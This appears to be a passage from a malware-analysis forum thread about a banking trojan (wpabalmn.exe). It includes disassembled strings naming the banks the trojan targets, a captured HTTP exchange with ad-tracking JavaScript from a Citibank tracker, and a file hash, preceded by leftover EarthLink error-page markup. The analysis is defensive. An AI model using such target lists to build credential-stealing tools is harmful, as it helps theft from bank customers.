00000361 00000361 0 body, td {font-size:76%; font-family:verdana,arial;}
00000396 00000396 0 body {margin:0;}
000003A7 000003A7 0 #page {margin:0;}
000003B9 000003B9 0 #page {background-color:#ffffff;}
000003DB 000003DB 0
0000042B 0000042B 0 #el1{width:100%; position:absolute; margin:20px 0; padding:0; margin-left:-8px; text-align:center; z-index:5;}
0000049A 0000049A 0 #el2{position:relative; padding-right:120px; width:780px; margin-left:auto; margin-right:auto; padding-left:18px;}
0000050D 0000050D 0 #results {background-color:#ffffff; height:100%; width:100%; vertical-align:top; text-align:center;padding-left:10px; padding-top:60px;}
00000596 00000596 0 #results ul {margin:10px 30px 10px 40px; padding:0; text-align:left;}
000005DC 000005DC 0 #results table ul {margin:10px 30px; padding:0;}
0000060D 0000060D 0 #results li { margin:0; padding:2px 0; }
00000636 00000636 0 #results table {width:760px; }
00000655 00000655 0 #results td { width:30%; vertical-align:top;}
00000683 00000683 0 #results table ul { list-style:none; font-weight:bold;}
000006BB 000006BB 0 #results table ul { white-space:nowrap;}
000006E4 000006E4 0 #results .lborder { border:solid #ccc; border-width: 1px; }
00000720 00000720 0 #results td { border:solid #ccc; border-width: 1px 1px 1px 0px; }
00000762 00000762 0 #results td a {color: ##0000ee; font-weight:normal;}
00000797 00000797 0 #results a {font-weight:bold; color: #0000ee;}
000007C6 000007C6 0 #results th p {background:#bdbdbd; color:#000000; font-size:60%; text-align:left; margin-bottom:3px; padding:4px;}
00000839 00000839 0 #results h3 {background: #bdbdbd; color:#000000; font-size:90%; text-align:left; padding-left:10px; margin:20px 20px 3px 20px; }
000008BA 000008BA 0 #results em { color:#999; }
000008D6 000008D6 0 #results .pager { text-align:center; margin-bottom:30px; }
00000911 00000911 0
00000961 00000961 0 #dym {text-align:left; font-weight:normal;font-size:80%; padding-left:4px;}
000009AD 000009AD 0 #dym a {color: #0000ee;}
000009C6 000009C6 0 #error h2, #dym h2 {margin:0; font-weight:normal; color:#ff6500; font-size:160%; padding:0; line-height:1.5em;}
00000A36 00000A36 0 #error p, #error h2 {text-align:justify;}
00000A60 00000A60 0 #error h4 {text-align:center;}
00000A7F 00000A7F 0 #error {text-align:left; margin:auto; width:80%; margin-top:20px;}
00000AC2 00000AC2 0 #dym {color:#222; line-height:2em;}
00000AE8 00000AE8 0 .searchbar {text-align:center; margin:5px auto 0 auto; min-wdith:300px; width:764px;}
00000B3E 00000B3E 0 .searchbar input {margin:2px;}
00000B5D 00000B5D 0 .searchbar img { margin-bottom:-.3em; margin-left:-60px;}
00000B97 00000B97 0 #suggest {width:25em;text-align:left;margin:4px auto; padding-left:78px;}
00000BE1 00000BE1 0 #suggest p {margin:0 0 4px 0; font-size:95%;}
00000C0F 00000C0F 0 #suggest h5 {margin:0 0 2px 0; font-size:95%;}
00000C3E 00000C3E 0 #suggest li {font-size:90%;}
00000C5B 00000C5B 0 #suggest li, #suggest p {white-space:nowrap;}
00000C89 00000C89 0 #suggest li, #suggest ul {margin:0; padding:0; list-style-position:inside;}
00000CD5 00000CD5 0
00000D25 00000D25 0 #skyad {vertical-align:top; background-color:#ffffff; padding:20px 10px 10px 10px;}
00000D79 00000D79 0 #banad {text-align:center; vertical-align:bottom; background-color:#ffffff; height:60px; padding:0; margin:0;}
00000DE8 00000DE8 0 #banad * {width:468px; margin: 0 auto 8px auto; padding:0;}
00000E24 00000E24 0
00000E74 00000E74 0 .keyword { font-weight:bold; }
00000E93 00000E93 0 #error h4 { background:#bbb; padding:4px 8px; font-weight:bold; width:100%; border:solid red;}
00000EF2 00000EF2 0 #results h5 { padding:0; margin:0; }
00000F17 00000F17 0 #results h4, h5 { font-size: 1em; color:#000; }
00000F47 00000F47 0 //-->
00000F4D 00000F4D 0
00000F58 00000F58 0
00000F60 00000F60 0
00000F68 00000F68 0
00000F86 00000F86 0 uniNav(); -->
00000FAA 00000FAA 0
00000FE6 00000FE6 0 chanNav(); -->
00001030 00001030 0
00001041 00001041 0
00001080 00001080 0
000010B5 000010B5 0
000010C4 000010C4 0 The web site address you entered could not be found.
0000110E 0000110E 0 Please try the related content suggestions and paid advertisements below, or try another search.
00001173 00001173 0 You entered "www.uonet.com ".
000011B0 000011B0 0 Did you mean www.duonet.com, www.ugonet.com, or www.donet.com?
00001259 00001259 0 www.someurl.com? -->
0000128F 0000128F 0
00001296 00001296 0 ALSO TRY THE FOLLOWING SUGGESTIONS
000012C1 000012C1 0
000012C7 000012C7 0
000012D2 000012D2 0

00001B43 00001B43 0

00002402 00002402 0

00002CB3 00002CB3 0
00002CC8 00002CC8 0
00002CDD 00002CDD 0
00002D1C 00002D1C 0
00002D81 00002D81 0
00002DC9 00002DC9 0
00002F75 00002F75 0
00002F7D 00002F7D 0
00002F84 00002F84 0
00002F91 00002F91 0
00003206 00003206 0
00003210 00003210 0
0000346A 0000346A 0
00003479 00003479 0
00003493 00003493 0 uniNav(); -->
000034B7 000034B7 0 footInc();-->
000034DA 000034DA 0
000034ED 000034ED 0 footInc_ppc();
0000350E 0000350E 0
0000355A 0000355A 0 2005 EarthLink, Inc.
00003575 00003575 0 All rights reserved.
00003590 00003590 0 Members and visitors to the EarthLink Web site agree to abide by our
000035D7 000035D7 0 Policies and Agreements.
00003633 00003633 0 EarthLink Privacy Policy
00003698 00003698 0 Feedback
000036FC 000036FC 0
00003704 00003704 0
0000370C 0000370C 0
00003716 00003716 0

Some interesting code in the file which seems to indicated some of the data it tries to still

CODE:004B7A98 aShellDocobject db 'Shell DocObject View',0 ; DATA XREF: sub_4B7198+3Ao
CODE:004B7AD8 aBancoDoBrasil db 'Banco-do-Brasil',0 ; DATA XREF: sub_4B7198+E3o
CODE:004B7AF0 dword_4B7AF0 dd 32h, 0FFFFFFFFh, 3 ; DATA XREF: sub_4B7198+1A3o
CODE:004B7B14 aHsbc db 'HSBC',0 ; DATA XREF: sub_4B7198+2EEo
CODE:004B7B30 aInvestshop db 'InvestSHOP',0 ; DATA XREF: sub_4B7198+31Bo
CODE:004B7B50 aEquifax db 'EQUIFAX',0 ; DATA XREF: sub_4B7198+35Co
CODE:004B7B6C aUnibanco db 'UNIBANCO',0 ; DATA XREF: sub_4B7198+3EAo
CODE:004B7B8C aItau db 'ITAU',0 ; DATA XREF: sub_4B7198+4F1o
CODE:004B7BA8 aDesco db 'DESCO',0 ; DATA XREF: sub_4B7198+5F8o
CODE:004B7BC4 aReal db 'REAL',0 ; DATA XREF: sub_4B7198+68Bo
CODE:004B7C00 aCitibank db 'CITIBANK',0 ; DATA XREF: sub_4B7198+70Do
CODE:004B7C20 aSantander db 'SANTANDER',0 ; DATA XREF: sub_4B7198+74Eo
CODE:004B7C40 aPaypal db 'PAYPAL',0 ; DATA XREF: sub_4B7198+78Fo
CODE:004B7C74 aRural db 'RURAL',0 ; DATA XREF: sub_4B7198+811o
CODE:004B7C90 aBesc db 'BESC',0 ; DATA XREF: sub_4B7198+84Fo
CODE:004B7CAC aNordeste db 'NORDESTE',0

I was looking at some of the other traffic coming from IE when I access citibank which is one of the targets listed in the strings of wpabalmn.exe. I found this stuff which after looking at it seems to be statistics tracking and ads.

GET /a/s/?BT_PID=99891&BT_CON=1&BT_PM=1&r=0.14543981421417085 HTTP/1.1
Accept: */*
Referer: http://www.citibank.com/us/d.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: citi.bridgetrack.com
Connection: Keep-Alive
Cookie: CitiBT%5F1=; CitiBT=SID=AFF8FE4015BD4406A882B78941937DF3&GUID=140EE61CA903445A99B381A37497B03E

HTTP/1.1 200 OK
Date: Sun, 07 Jan 2007 05:13:21 GMT
Connection: close
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Content-Length: 3374
Content-Type: application/x-javascript
Expires: Sat, 06 Jan 2007 05:13:22 GMT
Set-Cookie: CitiBT=GUID=140EE61CA903445A99B381A37497B03E&SID=AFF8FE4015BD4406A882B78941937DF3; expires=Wed, 02-Jan-2008 05:00:00 GMT; path=/
Cache-control: private

function BTWrite(s) { document.write(s); }
function BTAdClick(szURL) { window.open(szURL,'','width=750,height=550,scrollbars=1,resizable=1,menubar=1,status=1,titlebar=1,toolbar=1'); }
var h = "";
var swf_minversion=5;var swf_maxversion=7;var plugin = false;
if (((navigator.appName == "Netscape") && (navigator.userAgent.indexOf("Mozilla") != -1) &&
(parseFloat(navigator.appVersion) >= 4) && (navigator.javaEnabled()) &&
navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] &&
navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)) {
var plugname=navigator.plugins['Shockwave Flash'].description;var plugsub=plugname.substring(plugname.indexOf("."),-1); var plugsubstr=plugsub.substr(-1)
if( plugsubstr >= swf_minversion) { plugin = true;}
}
else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0 &&
(navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 ||
navigator.userAgent.indexOf("Windows NT")>=0) && document.all)
{
document.write('\n' +
'swf_maxversion = '+swf_maxversion+'\nswf_minversion = '+swf_minversion+'\n' +
'Do\nOn Error Resume Next\nplugin = (IsObject(CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" & swf_maxversion & \"\")))\n' +
'If plugin = true Then Exit Do\nswf_maxversion = swf_maxversion - 1\nLoop While swf_maxversion >= swf_minversion\n' +
'\n');
}
if ( plugin ) {
h += ('' );
h += ('');
h += ('');
h += ('\n' );
h += ('');

BTWrite(h);
} else if (!(navigator.appName && navigator.appName.indexOf("Netscape")>=0 && navigator.appVersion.indexOf("2.")>=0)){
document.write('');
}

I found another file running which turns out to be wpabalmn.exe
C:\>md5sum sysuphatch.exe
2b5f69da967ea1ba108a7e187701028d *sysuphatch.exe

Changed title

The last one sort of implied Einstein wrote the trojan instead of submitted it.